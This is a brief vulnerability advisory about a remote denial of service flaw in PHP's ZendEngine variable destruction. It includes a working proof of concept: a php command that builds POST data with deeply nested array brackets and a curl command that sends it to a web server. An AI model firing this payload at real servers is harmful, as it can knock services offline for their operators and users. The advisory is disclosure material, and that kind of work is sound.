• info
• discussion
• exploit
• solution
• references

PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability

To exploit this issue, an attacker must be able to execute PHP code on a vulnerable webserver.

The following proof-of-concept is available:

$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata

$ curl http://www.example.com/ -d @postdata